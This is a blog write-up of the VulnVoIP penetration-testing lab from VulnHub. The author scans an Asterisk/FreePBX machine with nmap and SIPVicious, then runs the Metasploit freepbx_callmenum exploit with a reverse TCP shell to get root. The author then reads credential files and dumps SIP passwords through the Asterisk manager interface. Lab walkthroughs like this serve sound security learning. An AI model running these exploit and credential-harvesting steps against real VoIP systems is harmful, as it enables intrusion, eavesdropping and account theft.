Pentest lab - VulnVoIP - Core dump overflow

I found a very interesting virtual machine on VulnHub that focuses on VoIP vulnerabilities. Since I haven’t seen any other VoIP resources, I thought it would be great to give this a try.

VulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail.

The IP of the target machine is 192.168.80.131. Here are the results of the port scan:

nmap -A -p1-65535 192.168.80.131

Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-07 19:45 EEST
Nmap scan report for 192.168.80.131
Host is up (0.00023s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)
|_  2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA)
53/tcp   open  domain     dnsmasq 2.45
| dns-nsid: 
|_  bind.version: dnsmasq-2.45
80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: FreePBX
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            966/udp  status
|_  100024  1            969/tcp  status
969/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
4445/tcp open  upnotifyp?
5038/tcp open  asterisk   Asterisk Call Manager 1.1
MAC Address: 00:0C:29:84:8C:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.32

Let’s look at that DNS server first:

dnsmasq is a lightweight DNS, TFTP and DHCP server. It is intended to provide coupled DNS and DHCP service to a LAN.

Dnsmasq accepts DNS queries and either answers them from a small, local, cache or forwards them to a real, recursive, DNS server. It loads the contents of /etc/hosts so that local hostnames which do not appear in the global DNS can be resolved and also answers DNS queries for DHCP configured hosts.

The dnsmasq DHCP server supports static address assignments and multiple networks. It automatically sends a sensible default set of DHCP options, and can be configured to send any desired set of DHCP options, including vendor-encapsulated options. It includes a secure, read-only, TFTP server to allow net/PXE boot of DHCP hosts and also supports BOOTP.

Dnsmasq supports IPv6 for DNS, but not DHCP.

There is a Heap Overflow and Null-pointer Dereference vulnerability affecting the TFTP server component:

CVE-2009-2957

A vulnerability has been found that may allow an attacker to execute arbitrary code on servers or home routers running dnsmasq with the TFTP service enabled (‘—enable-tfp’). This service is not enabled by default on most distributions; in particular it is not enabled by default on OpenWRT or DD-WRT. Chances of successful exploitation increase when a long directory prefix is used for TFTP. Code will be executed with the privileges of the user running dnsmasq, which is normally a non-privileged one.

Additionally there is a potential DoS attack to the TFTP service by exploiting a null-pointer dereference vulnerability.

I wasn’t able to exploit this though, so moving on.

Navigating to the web page, we see two links, for Voicemail & Recordings (ARI) and FreePBX Administration. The administration page requires HTTP authentication, and the other one is a login portal.

A Nessus scan revealed that the Asterisk Recording Interface uses a default set of credentials for the administrator’s account: admin/ari_password, on the URL http://192.168.80.131/recordings/index.php . I didn’t find anything useful even after logging in. These credentials didn’t work on the admin page at http://192.168.80.131/admin/config.php , but I was able to glean the FreePBX version from the webpage (2.7.0.0). Might come in handy later!

Since this is my first time doing anything remotely related to VoIP, I had some googling and reading to do. For a while I just digressed from the main goal of hacking this machine to burying myself in the Session Initiation Protocol RFC (ouch!), and 2 books: Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions and Hacking VoIP: Protocols, Attacks, and Countermeasures.

So, a short introduction to SIP is in order:

SIP is an application-layer control protocol that can establish, modify, and terminate multimedia sessions (conferences) such as Internet telephony calls. SIP can also invite participants to already existing sessions, such as multicast conferences.

SIP employs design elements similar to the HTTP request/response transaction model. Each transaction consists of a client request that invokes a particular method or function on the server and at least one response. SIP reuses most of the header fields, encoding rules and status codes of HTTP, providing a readable text-based format.

Each resource of a SIP network, such as a user agent or a voicemail box, is identified by a URI, based on the general standard syntax also used in Web services and e-mail. The URI scheme used for SIP is sip: and a typical SIP URI is of the form: sip:username:password@host:port

SIP clients typically use TCP or UDP on port numbers 5060 and/or 5061 to connect to SIP servers and other SIP endpoints. Port 5060 is commonly used for non-encrypted signaling traffic whereas port 5061 is typically used for traffic encrypted with TLS. SIP is primarily used in setting up and tearing down voice or video calls.

SIP Requests

INVITE – A client is being invited to participate in a call.
ACK – The client has confirmed the INVITE request.
BYE – The call has been terminated by either the caller or callee.
CANCEL – Cancel any pending requests.
OPTIONS – Queries the server for its capabilities.
REGISTER – Registers the client with the server according to the address in the To header.
PRACK – Similar to ACK, but a provisional confirmation.
SUBSCRIBE – Subscribes the device for an event notification.
NOTIFY – Notifies all subscribers of an event.
PUBLISH – Publishes an event to a server.
INFO – Sends information in the middle of a session that doesn’t modify the session’s state.
REFER – Asks the client to issue a SIP request, typically a call transfer.
MESSAGE – Sends an instant message using SIP.
UPDATE – Modifies a session’s state without altering the dialog state.

And, a little about Asterisk and FreePBX:

Asterisk is a software implementation of a telephone private branch exchange (PBX). Like any PBX, it allows attached telephones to make calls to one another, and to connect to other telephone services, such as the public switched telephone network (PSTN) and Voice over Internet Protocol (VoIP) services.

FreePBX is an open source GUI that controls and manages Asterisk

I found an awesome tool suite for this challenge: SIPVicious

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of the folowing tools:

svmap – this is a sip scanner. Lists SIP devices found on an IP range

svwar – identifies active extensions on a PBX

svcrack – an online password cracker for SIP PBX

svreport – manages sessions and exports reports to various formats

svcrash – attempts to stop unauthorized svwar and svcrack scans

Let’s get started then!

./svmap.py 192.168.80.1/24
| SIP Device          | User Agent            | Fingerprint |
-------------------------------------------------------------
| 192.168.80.131:5060 | Asterisk PBX 1.6.2.11 | disabled    |

Now we also have the Asterisk version. Next, we need to find valid extensions (it took a while of trial and error to get meaningful information on this one):

./svwar.py -D -m INVITE 192.168.80.131
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 2000      | reqauth        |
| 102       | reqauth        |
| 100       | weird          |
| 101       | reqauth        |

The -D option enables scanning for default extensions, and the -m option specifies a request method (INVITE indicates that a client is being invited to participate in a call session.)

If you read the VM description on VulnHub, you probably remember that it mentions an easy way to get root to the machine. I found an exploit for that in Metasploit, more info here: http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/

use exploit/unix/http/freepbx_callmenum

msf exploit(freepbx_callmenum) > show options

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  2000-2001        yes       A range of Local extension numbers
   Proxies                     no        Use a proxy chain
   RHOST      192.168.80.131   yes       The target address
   RPORT      80               yes       The target port
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.80.130   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

I specified the extension to match one of those that we previously discovered. And the machine belongs to us now!

msf exploit(freepbx_callmenum) > exploit

[*] Started reverse handler on 192.168.80.130:4444 
[*] 192.168.80.131:80 - Sending evil request with range 2000
[*] 192.168.80.131:80 - Sending evil request with range 2001
[*] Command shell session 1 opened (192.168.80.130:4444 -> 192.168.80.131:47268) at 2014-10-14 14:42:29 +0300

whoami
root

But we are not done. We still have to find the usernames and passwords, and get the voicemail from the Support account. I googled a bit for a helpful configuration file, which turned out to be the amportal.conf file:

cat /etc/amportal.conf
# This file is part of FreePBX.
#
#    FreePBX is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 2 of the License, or
#    (at your option) any later version.
#
#    FreePBX is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with FreePBX.  If not, see <http://www.gnu.org/licenses/>.
#
# This file contains settings for components of the Asterisk Management Portal
# Spaces are not allowed!
# Run /usr/src/AMP/apply_conf.sh after making changes to this file

# AMPDBHOST: the host to connect to the database named 'asterisk'
AMPDBHOST=localhost

# AMPDBUSER: the user to connect to the database named 'asterisk'
AMPDBUSER=freepbx

# AMPDBENGINE: the type of database to use
AMPDBENGINE=mysql

# AMPDBPASS: the password for AMPDBUSER
AMPDBPASS=fpbx

# AMPENGINE: the telephony backend engine to use
AMPENGINE=asterisk

# AMPMGRUSER: the user to access the Asterisk manager interface
AMPMGRUSER=admin

# AMPMGRPASS: the password for AMPMGRUSER
AMPMGRPASS=amp111
..............................................
# AUTHTYPE: authentication type to use for web admin
# If type set to 'database', the primary AMP admin credentials will be the AMPDBUSER/AMPDBPASS above
# valid: none, database
AUTHTYPE=database

We have the username and password for the admin interface now.

webadmin interface

If we go to Panel, we can see that 2000 is the extension for the Support account. But I still couldn’t find a way to actually listen to the voicemail message, and I don’t have the password. But, I also have the credentials for the Asterisk Login Manager, so let’s see if that helps. To login and authenticate to the manager, you must send a “login” action, with your user name and secret (password) as parameters. We can use telnet for this (don’t forget to hit Enter twice after inputting the parameters):

telnet 192.168.80.131 5038
Trying 192.168.80.131...
Connected to 192.168.80.131.
Escape character is '^]'.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted

For a comprehensive list of Asterisk commands, check out this Asterisk CLI resource and Manager Actions. To list the SIP users, we have to use a “command” action this time. And then specify the command, which is sip show users:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--

And it was this easy to get the usernames and passwords! I should have started with that! Now it’s possible to dial the extension and listen to the voicemail message. I just randomly chose Jitsi as a VoIP client for this task. You have to download and install the package file:

wget https://download.jitsi.org/jitsi/debian/jitsi_2.5-latest_amd64.deb
dpkg -i jitsi_2.5-latest_amd64.deb

Next, create an account in Jitsi:

jitsi

However, when you make the call, it asks for a voicemail password! I went back to my shell on the machine and to googling about Asterisk voicemail paswords. The configuration file that comes to the rescue is /etc/asterisk/voicemail.conf.

cat /etc/asterisk/voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no

So, the password is 0000, and we can now listen to the message, which I’ll type here for the sake of completeness (hope I got it right):

“Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123, all one word in lowercase. You can log on at the usual address. See you in the morning”

Well, I really liked this challenge! It made me read up about various subjects I wasn’t familiar with, like Asterisk and SIP. I also discovered the SIPVicious suite, which should come in handy from now on. And it was a great feeling to finally hear the message at the end. Also, VoIP hacking is a very interesting topic, and I hope there will be more chances to practice and learn about it.

FORTUNE PROVIDES QUESTIONS FOR THE GREAT ANSWERS: #31

Q: What is the name of the world’s oldest kamikaze pilot?

A: Chicken Teriyaki.

Core dump overflow

Core dump in progress...

Pentest lab - VulnVoIP

Comments